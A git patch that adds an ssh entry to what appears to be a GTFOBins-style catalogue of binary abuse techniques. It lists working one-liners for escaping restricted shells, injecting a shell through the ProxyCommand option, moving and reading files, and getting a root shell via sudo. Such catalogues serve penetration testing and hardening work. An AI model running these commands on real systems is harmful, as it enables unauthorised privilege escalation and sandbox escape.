From 2059c2181f69eb2150c64417b0bd9f01b2ae7665 Mon Sep 17 00:00:00 2001 From: t0thkr1s Date: Fri, 10 Jan 2020 13:11:33 +0100 Subject: [PATCH] add data for ssh --- data/ssh.json | 38 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 data/ssh.json diff --git a/data/ssh.json b/data/ssh.json new file mode 100644 index 0000000..428764d --- /dev/null +++ b/data/ssh.json @@ -0,0 +1,38 @@ +{ + "functions": { + "shell": [ + { + "description": "Reconnecting may help bypassing restricted shells.", + "code": "ssh localhost $SHELL --noprofile --norc" + }, + { + "description": "Spawn interactive shell through ProxyCommand option.", + "code": "ssh -o ProxyCommand=';sh 0<&2 1>&2' x" + } + ], + "file-upload": [ + { + "description": "Send local file to a SSH server.", + "code": "ssh [user@host] \"cat > [destination_file]\" < [source_file]\n" + } + ], + "file-download": [ + { + "description": "Fetch a remote file from a SSH server.", + "code": "ssh [user@host] \"cat [source_file]\" > [destination_file]\n" + } + ], + "file-read": [ + { + "description": "The read file content is corrupted by error prints.", + "code": "ssh -F [file] localhost\n" + } + ], + "sudo": [ + { + "description": "Spawn interactive root shell through ProxyCommand option.", + "code": "sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x" + } + ] + } +} \ No newline at end of file